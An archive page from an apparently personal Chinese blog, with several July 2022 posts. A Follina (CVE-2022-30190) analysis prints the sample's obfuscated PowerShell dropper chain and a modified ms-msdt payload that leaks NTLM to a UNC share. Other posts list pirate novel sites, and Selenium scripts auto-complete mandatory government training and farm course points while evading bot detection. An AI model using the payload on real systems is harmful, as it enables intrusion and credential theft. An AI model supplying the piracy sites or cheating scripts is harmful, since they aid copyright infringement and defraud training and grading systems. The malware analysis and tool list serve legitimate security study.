2022年7月

渗透测试信息收集思路&工具分享

作者: 纯情
时间: 2022-07-02
分类: 网络
评论

1. 企查查-爱企查-天眼查

域名
小程序
微信公众号
APP
微博
邮箱

生活号

https://github.com/cqkenuo/appinfoscanner
https://www.qcc.com/
https://www.tianyancha.com/
https://aiqicha.baidu.com/
google.com \ baidu.com \ bing.cn

2. 收集子域名

收集目标子域名信息

https://x.threatbook.cn/
https://github.com/shmilylty/OneForAll
Layer子域名挖掘机
https://github.com/lijiejie/subDomainsBrute
https://github.com/Jewel591/SubDomainFinder
https://github.com/aboul3la/Sublist3r
https://github.com/knownsec/ksubdomain
https://github.com/Threezh1/JSFinder
google.com \ baidu.com \ bing.cn
http://tool.chinaz.com/dns
https://www.dnsdb.io
https://fofa.so/
https://www.zoomeye.org/
https://www.shodan.io/
https://censys.io/
DNSenum
nslookup
https://www.isc.org/download/
https://code.google.com/archive/p/dnsmap/
https://github.com/0x727/ShuiZe_0x727

3. 域名指纹识别

对上面收集到的域名进行识别

https://github.com/EdgeSecurityTeam/EHole
https://github.com/al0ne/Vxscan
https://github.com/EASY233/Finger
https://github.com/TideSec/TideFinger
https://github.com/urbanadventurer/WhatWeb
https://gobies.org/
https://www.yunsee.cn/
https://github.com/s7ckTeam/Glass
https://github.com/TideSec/TideFinger
https://scan.dyboy.cn/web/
https://fp.shuziguanxing.com/#/
https://builtwith.com/zh/
https://github.com/FortyNorthSecurity/EyeWitness
https://www.yunsee.cn/
https://www.wappalyzer.com/
https://github.com/0x727/ObserverWard
https://github.com/0x727/ShuiZe_0x727
https://github.com/P1-Team/AlliN
https://github.com/dr0op/bufferfly

4. IP收集、C段收集、端口

根据域名收集对应的IP
如果遇到CDN可以考虑以下方法：

查看dns解析记录

https://dnsdb.io/zh-cn/ ###DNS查询
https://x.threatbook.cn/ ###微步在线
http://toolbar.netcraft.com/site_report?url= ###在线域名信息查询
http://viewdns.info/ ###DNS、IP等查询
https://tools.ipip.net/cdn.php ###CDN查询IP

SecurityTrails平台

找子域名的IP
- 微步在线
- https://dnsdb.io/
- xxxx.com.cn type:A
google
子域名扫描器
网络空间搜索引擎
- shodan
- fofa
- zoomeye
- 全球鹰
- quake
SSL证书
HTTP头
利用网站返回内容特征搜索
国外主机访问
网站漏洞
- phpinfo
- xss
- ssrf
邮件订阅（RSS）
zmap
F5 LTM

如果没有CDN就直接扫

nmap
masscan
https://github.com/EdgeSecurityTeam/Eeyes
https://github.com/shadow1ng/fscan
https://github.com/Adminisme/ServerScan
https://github.com/EdgeSecurityTeam/EHole

5. 目录扫描

https://github.com/maurosoria/dirsearch
dirbuster
gobuster
dirb
https://github.com/xmendez/wfuzz
https://github.com/foryujian/yjdirscan
https://github.com/H4ckForJob/dirmap

6. 漏洞扫描

nessus
wavs
https://github.com/H4ckForJob/dirmap
https://github.com/chaitin/xray
https://github.com/wgpsec/DBJ
https://github.com/sullo/nikto
https://github.com/zhzyker/vulmap/
https://github.com/projectdiscovery/nuclei
https://github.com/greenbone/openvas-scanner
https://github.com/wpscanteam/wpscan
http://www.encoreconsulting.com/3-10-AppScan.html
https://github.com/78778443/QingScan

7. 微信小程序信息收集

8. 微信公众号信息收集

9. 支付宝小程序信息收集

10. APP信息收集

https://github.com/cqkenuo/appinfoscanner

https://github.com/projectdiscovery/nuclei/blob/master/README_CN.md
https://github.com/smicallef/spiderfoot

11. 网站JS信息收集

https://github.com/Threezh1/JSFinder
https://github.com/GerbenJavado/LinkFinder
https://github.com/rtcatc/Packer-Fuzzer (webpack)
https://github.com/momosecurity/FindSomething

12. 其他信息收集

用户名
密码
GitHub
网盘
钉钉
语雀
码云
gitree
微信
邮箱
备份文件
知乎
贴吧
社工库
等

2022省考公务员考试押题大礼包最新干货

作者: 纯情
时间: 2022-07-02
分类:
评论

1.华图各省密卷
2.7.9省考考前必看
3.省考压题作文27篇
4.省考常识预测30篇

链接：https://pan.baidu.com/s/1fSU3G7qcX-wkGTuOuK1Mqg?pwd=52pj
提取码：52pj

飞卢小说不得不说开局还是特别吸引人眼球的，我之前就在抖音上刷到过，看着挺好看的，就下载，还充了50块钱，结果看了30多章就看不下去了。
下载飞卢小说的方法主要分为两种
免费的跟付费的，价格非常低，大概几毛一本吧
先说免费的，这类主要是网站跟 qq 群，但是 qq 群的资源基本都是搬运的，至于为什么？
往下看你就知道了。
这类网站大概有以下几个，我可以保证飞卢的盗版基本都是来源于这几个网站，然后别人在
做成 txt，就像你们现在看到群文件的那些。
在下面的网站中搜索时，记住
不能有错别字，不能有符号
别搜全称，一定不要搜全称
搜不到时，可以试试搜索作者名
网站如下
A. 加窜小说——http://www.jiacuan.com/
B. 99 小说网——https://m.99wanban.com/（主推）
C. 好书友论坛——https://www.93book.com（跟 b 互补，但是付费，几毛一本）
D. 阅次元论坛——https://www.abooky.com/（可以理解为低阶版的 c）
E. 同人文——https://www.trxs.cc/（最近莫名其妙火起来的网站）
F. 爱看书吧——自己百度搜（极不推荐）
如果在以上几个网站没有找到资源，我敢说你在任何一个地方都找不到了，我非常自信！

CVE-2022-30190 样本分析与漏洞复现

作者: 纯情
时间: 2022-07-01
分类: 网络
评论

前言

近期新爆出的漏洞office的0day，利用msdt+远程加载
CVE:CVE-2022-30190

样本地址：https://app.any.run/tasks/713f05d2-fe78-4b9d-a744-f7c133e3fafb/#

简单分析

无VBA，远程加载

doc改名zip解压，搜索远程加载的地址定位到word_rels\document.xml.rels

通过查看app.any.run沙箱捕获的请求地址内容，查看如下

中间的内容是一段powershell，解码后如下

<!doctype html>
<html lang="en">
<body>
<script>
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA


    window.location.href = "ms-msdt:/id PCWDiagnostic /skip force /param \"IT_RebrowseForFile=cal?c IT_LaunchMethod=ContextMenu IT_SelectProgram=NotListed IT_BrowseForFile=h$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'UTF8.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'JGNtZCA9ICJjOlx3aW5kb3dzXHN5c3RlbTMyXGNtZC5leGUiO1N0YXJ0LVByb2Nlc3MgJGNtZCAtd2luZG93c3R5bGUgaGlkZGVuIC1Bcmd1bWVudExpc3QgIi9jIHRhc2traWxsIC9mIC9pbSBtc2R0LmV4ZSI7U3RhcnQtUHJvY2VzcyAkY21kIC13aW5kb3dzdHlsZSBoaWRkZW4gLUFyZ3VtZW50TGlzdCAiL2MgY2QgQzpcdXNlcnNccHVibGljXCYmZm9yIC9yICV0ZW1wJSAlaSBpbiAoMDUtMjAyMi0wNDM4LnJhcikgZG8gY29weSAlaSAxLnJhciAveSYmZmluZHN0ciBUVk5EUmdBQUFBIDEucmFyPjEudCYmY2VydHV0aWwgLWRlY29kZSAxLnQgMS5jICYmZXhwYW5kIDEuYyAtRjoqIC4mJnJnYi5leGUiOw=='+[char]34+'))'))))i/../../../../../../../../../../../../../../Windows/System32/mpsigstub.exe IT_AutoTroubleshoot=ts_AUTO\"";
</script>


</body>
</html>


////////////////////
powershell IEX运行
$(Invoke-Expression($(Invoke-Expression('[System.Text.Encoding]'+[char]58+[char]58+'UTF8.GetString([System.Convert]'+[char]58+[char]58+'FromBase64String('+[char]34+'JGNtZCA9ICJjOlx3aW5kb3dzXHN5c3RlbTMyXGNtZC5leGUiO1N0YXJ0LVByb2Nlc3MgJGNtZCAtd2luZG93c3R5bGUgaGlkZGVuIC1Bcmd1bWVudExpc3QgIi9jIHRhc2traWxsIC9mIC9pbSBtc2R0LmV4ZSI7U3RhcnQtUHJvY2VzcyAkY21kIC13aW5kb3dzdHlsZSBoaWRkZW4gLUFyZ3VtZW50TGlzdCAiL2MgY2QgQzpcdXNlcnNccHVibGljXCYmZm9yIC9yICV0ZW1wJSAlaSBpbiAoMDUtMjAyMi0wNDM4LnJhcikgZG8gY29weSAlaSAxLnJhciAveSYmZmluZHN0ciBUVk5EUmdBQUFBIDEucmFyPjEudCYmY2VydHV0aWwgLWRlY29kZSAxLnQgMS5jICYmZXhwYW5kIDEuYyAtRjoqIC4mJnJnYi5leGUiOw=='+[char]34+'))'))))




///////////////////
base64解码内容：
$cmd = "c:\windows\system32\cmd.exe";
Start-Process $cmd -windowstyle hidden -ArgumentList "/c taskkill /f /im msdt.exe"; # 隐藏窗口杀死msdt.exe
Start-Process $cmd -windowstyle hidden -ArgumentList "/c cd C:\users\public\&&for /r %temp% %i in (05-2022-0438.rar) do copy %i 1.rar /y&&findstr TVNDRgAAAA 1.rar>1.t&&certutil -decode 1.t 1.c &&expand 1.c -F:* .&&rgb.exe"; # 进入public目录，循环遍历 RAR 文件中的文件，查找编码 CAB


文件的 Base64 字符串
将此 Base64 编码的 CAB 文件存储为1.t
解码Base64编码的CAB文件保存为1.c
将1.c CAB文件展开到当前目录，最后：
执行rgb.exe（大概压缩在1.c CAB文件里面）

运行了rgb.exe后会释放几个文件，最后调用csc编译
(cs太长了就不贴出来了)

msdt微软官方参数解释如下：

param参数貌似微软没公开怎么调用，只给了架构图

漏洞复现

参考链接：
https://huntress.com/blog/microsoft-office-remote-code-execution-follina-msdt-bug
https://benjamin-altpeter.de/shell-openexternal-dangers/
https://github.com/JohnHammond/msdt-follina

tips:html注释内容不能少于4096字节
将原payload修改为以下可以远程请求获取NTLM

ms-msdt:-id PCWDiagnostic /moreoptions false /skip true /param IT_BrowseForFile="\\\\192.168.92.129\\sharp\\calc.exe" /param IT_SelectProgram="NotListed" /param IT_AutoTroubleshoot="ts_AUTO"

执行命令和上线

踩坑：powershell语句太长base64编码执行不成功报错如下

湖北省干部在线学习selenium自动学习python脚本代码

作者: 纯情
时间: 2022-07-01
分类: 网络
评论

正文

我的chrome没有适合的驱动版本，又不想卸载重装，于是就用了edge,同时将edge停掉了自动更新，防止更新后驱动不能用
使用前，需要先自选课程，多说一句，本来用selenium弄了自选的代码，结果偶尔会报错，就懒得弄了。选好课程后，启动程序将自动学习，直到你的自选课程学完或者学够了50分，程序将停止
为了不影响电脑的前台操作，将窗口后台运行了，并关掉了音量，自己运行时，可以看一下注释，想听声音或者前台运行，可以将相应的代码注释掉就可以了

以下为代码

from selenium import webdriver
import time
from selenium.webdriver.common.by import By
from selenium.webdriver.chrome.service import Service
 
def start():
    browser.get("http://www.hbgbzx.gov.cn/login.html")  # 打开干部在线
    time.sleep(3)
    login(account,password)
 
def login(account,password):
    browser.find_element(By.ID, 'name').send_keys(account)  # 输入账号
    time.sleep(2)
    browser.find_element(By.ID, "password").send_keys(password) # 输入密码
    time.sleep(2)
    browser.find_element(By.XPATH, '//*[@id="form1"]/div/div/ul/li[3]/input').click()   # 点击确定
    time.sleep(3)
    print('------登录成功！！-----')
    browser.switch_to.alert.accept()    # 跳过登陆后的弹窗
    time.sleep(2)
    browser.find_element(By.XPATH, '//*[@id="menu3"]/p').click()  # 打开我的课程
    time.sleep(2)
    browser.find_element(By.XPATH, '//*[@id="sonmenu3"]/div[1]/a').click()  # 打开自选课程
    time.sleep(2)
    study()
 
def study():
    browser.find_element(By.XPATH, '//*[@id="right"]/div[4]/table/tbody/tr[3]/td/a[1]').click()  # 点击我要学习按钮
    name=browser.find_element(By.XPATH,'//*[@id="right"]/div[4]/table/tbody/tr[1]/td/span').text    # 课程的名字
    # 课程的时长
    minute=browser.find_element(By.XPATH,'//*[@id="right"]/div[4]/table/tbody/tr[2]/td/div[4]/span[2]').text
    time.sleep(2)
    print(f'开始学习！')
    print(f'{name}')
    print(f'时长{minute}')
    browser.switch_to.window(browser.window_handles[1]) # 切换到视频学习网页的页面
    # 跳过网页内的双层iframe嵌套
    browser.switch_to.frame('course_frm')
    browser.switch_to.frame('course_frame')
    browser.find_element(By.XPATH, '/html/body/div/div[3]/div[2]').click()  # 点击开始学习或者继续学习按钮
    time.sleep(3)
    browser.switch_to.window(browser.window_handles[0]) # 切换回自选课程页面
    browser.refresh()   # 刷新网页
    choose(count)
 
def choose(count):
    # 获取左下角的总分数
    score = browser.find_element(By.XPATH, '//*[@id="xyxx"]/div[4]/span').text
    print(f'现在总分为：{score}')
    # 获取当前学习课程的分数
    # percent = browser.find_element(By.XPATH, '//*[@id="right"]/div[4]/table/tbody/tr[2]/td/div[2]/span/span').text
    # 判断总分数是否大于等于50分，若大于等于50分，则退出程序
    if score<'50.00':
        while True:
            # 将总分数赋值给m，用以判断程序的运行
            time.sleep(60)  # 每60秒刷新一次网页，并记录刷新网页的次数
            browser.refresh()
            count += 1
            print(f'第{count}次刷新页面，60秒后再次刷新页面')
            # 页面刷新后将总分数再次赋值给x，用以判断是否调用study()函数
            x=browser.find_element(By.XPATH, '//*[@id="xyxx"]/div[4]/span').text
            # 学习进度情况
            percent=browser.find_element(By.XPATH,'//*[@id="right"]/div[4]/table/tbody/tr[3]/td/span').text
            print(f'当前学习进度为：{percent}')
            if x<'50.00':
                study()
            # elif m<x:
            #     study()
            else:
                print('已经大于50分，程序退出')
                break
    else:
        browser.quit()
        print('已经学习了50分，本次学习结束')
 
if __name__ == '__main__':
    account=input('请输入你的账号：')
    password=input('请输入你的密码：')
    count = 0
    edge_driver = Service(r"E:\\edgedriver\\msedgedriver.exe")  # 调用edge浏览器的驱动程序
    option=webdriver.EdgeOptions()
    option.use_chromium=True
    option.add_argument('headless')     # 将浏览器后台运行，不影响前台的操作
    option.add_argument('disable-gpu')
    option.add_argument('--mute-audio') # 关闭浏览器内的声音
    browser = webdriver.Edge(service=edge_driver,options=option)
    start()

云班课浏览资源刷经验值python脚本

作者: 纯情
时间: 2022-07-01
分类: 网络
评论

现在云班课经验值获取规则如下：观看完视频后，点击图片/ppt/doc/pdf/xlsx/网页链接就有
手动刷视频，其他的python脚本程序可以刷
账号、cookie、课程网址需要填写到代码中

from time import sleep
 
from selenium import webdriver
from selenium.webdriver.chrome.options import Options
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from selenium.webdriver.common.action_chains import ActionChains
from selenium.webdriver.common.keys import Keys
 
class Browser:
 
    login_token = {}
    phone_number = ''
 
    course1 = '' 
    course2 = '' 
    login_url = 'https://www.mosoteach.cn/web/index.php?c=passport&m=index'
 
    def __init__(self):
        options = Options()
        options.page_load_strategy = 'eager'
        self.browser = webdriver.Chrome(options=options)
        self.browser.maximize_window()
        # 修改 window.navigator.webdriver 的值
        self.browser.execute_cdp_cmd('Page.addScriptToEvaluateOnNewDocument', {
            'source':'''
            Object.defineProperty(navigator, 'webdriver', {
                get: () => undefined
                })'''
        })
 
    def get_cookie(self):
        self.browser.get(self.login_url)
        self.browser.find_element(By.ID, 'phone-login-button').click()  # 切换到短信验证码登录
        self.browser.find_element(By.ID, 'phone-login-remember-me').click() # 勾选 30 天自动登录
        self.browser.find_element(By.ID, 'phone-number').send_keys(self.phone_number)
 
        slider = self.browser.find_element(By.XPATH, '//div[@class="slider-box"]//span[@class="nc_iconfont btn_slide"]')
        size = self.browser.find_element(By.XPATH, '//div[@class="slider-box"]//div[@class="scale_text slidetounlock"]').size
        ActionChains(self.browser).drag_and_drop_by_offset(slider, size['width'], -size['height']).perform()    # 滑动滑块
        button = self.browser.find_element(By.ID, 'get-verify-code')
        WebDriverWait(self.browser, 3).until(EC.element_to_be_clickable(button))    # 判断节点是否可以点击
        button.click()
        input = self.browser.find_element(By.XPATH, '//div[@class="verify-box"]/input')
        input.click()   # 将光标定位到输入框
        # 判断验证码是否输入完毕
        while True:
            verify_code = input.get_attribute('value')
            if len(verify_code) == 4:
                break
        self.browser.find_element(By.ID, 'login-button-2').click()
        WebDriverWait(self.browser, 30).until(EC.title_is('云班课 - 我的班课'))
        cookie = self.browser.get_cookie('login_token')
        with open('d:/cookies.txt', 'w', encoding='utf-8') as f:
            f.write(str(cookie))
 
    # 勾选 30 天自动登录后，才有 login_token 这个 cookie
    def login(self):
        self.browser.get(self.login_url)
        self.browser.delete_all_cookies()
        self.browser.add_cookie(self.login_token)
        self.browser.get(self.login_url)
 
    def browse(self):
        self.browser.get(self.course2)   # 打开课程
        hide_div = self.browser.find_elements(By.CLASS_NAME, 'hide-div')
        for div in hide_div:
            print(div.find_element(By.XPATH, './preceding-sibling::*').find_element(By.TAG_NAME, 'span').text)
            self.browser.execute_script('arguments[0].scrollIntoView();', div)  # 将页面跳转到元素的位置
            remain = div.find_element(By.XPATH, './preceding-sibling::*/span[3]').text
            if remain == '0':   # 判断是否有未读文件
                continue
            if div.get_attribute('data-status')  == 'N':    # 判断是否已展开
                div.find_element(By.XPATH, './preceding-sibling::*').click()    # 展开分组
            resource = div.find_elements(By.CLASS_NAME, 'res-info')
            # 资源有：.jpg（Esc 键关闭）、.pdf/.pptx/.doc/.xls/网页链接（新标签页打开）、视频（手动播放）
            for res in resource:
                self.browser.execute_script('arguments[0].scrollIntoView();', res)  # 将页面跳转到元素的位置
                if res.find_elements(By.XPATH, './div[2]/span')[-3].get_attribute('data-is-drag') == 'N':     # 筛选出未读的资源
                    filename = res.find_element(By.CLASS_NAME, 'res-name').text
                    print(filename)
                    if filename.endswith('.mp4'):   # 跳过视频
                        continue
                    elif filename.endswith('.jpg'):   # 图片
                        print('正在打开图片：', filename)
                        res.click()
                        sleep(2)    # 视网络情况可适当修改时间，建议2~3秒
